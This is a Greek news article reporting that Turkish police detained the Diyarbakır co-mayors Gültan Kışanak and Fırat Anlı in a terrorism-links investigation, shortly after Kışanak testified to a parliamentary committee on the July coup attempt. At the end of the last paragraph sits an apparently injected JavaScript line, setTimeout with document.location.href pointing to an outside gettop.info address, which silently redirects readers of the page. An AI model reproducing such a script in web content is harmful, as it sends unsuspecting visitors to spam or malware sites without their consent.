Συνελήφθησαν οι δήμαρχοι του Ντιγιαρμπακίρ για σχέσεις με την τρομοκρατία

0
2

 

Οι δήμαρχοι της πόλης του Ντιγιαρμπακίρ συνελήφθησαν από την τουρκική αστυνομία ως μέρος εισαγγελικής έρευνας για σχέσεις τους με την τρομοκρατία. Η Γκουλτάν Κισανάκ, πρώην μέλος του κοινοβουλίου πριν την εκλογή της ως δήμαρχος της πόλης και η Φιράτ Ανλί τέθηκαν υπό κράτηση, ανέφεραν οι πηγές των δυνάμεων ασφαλείας.

Οι αρχές πραγματοποιούν έρευνα στο γραφείο τους, ενώ ένας συνεργάτης της Κισανάκ ανέφερε πως οι αστυνομικές δυνάμεις πραγματοποιούν έρευνα στο σπίτι της δημάρχου, χωρίς να μπορέσει να δώσει περαιτέρω λεπτομέρειες, δίχως να γνωρίζει τις κατηγορίες με τις οποίες έγιναν οι συλλήψεις.

Η 55χρονη Κισανάκ, γνωστό κουρδικό πολιτικό στέλεχος εκλέχθηκε το 2014 ως πρώτη γυναίκα δήμαρχος της πόλης.

Νωρίτερα την Τρίτη, κατέθεσε ενώπιον μιας κοινοβουλευτικής επιτροπής στην Άγκυρα που ερευνά το αποτυχημένο στρατιωτικό πραξικόπημα της 15ης Ιουλίου.

Δεν κατέστη άμεσα σαφές αν η κατάθεση της στην επιτροπή σχετιζόταν με την κράτηση της, που συνέβη με την επιστροφή της στο αεροδρόμιο του Ντιγιάρμπακιρ.

Η Ανλί συνελήφθη στην οικία της, τόνισαν οι πηγές. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here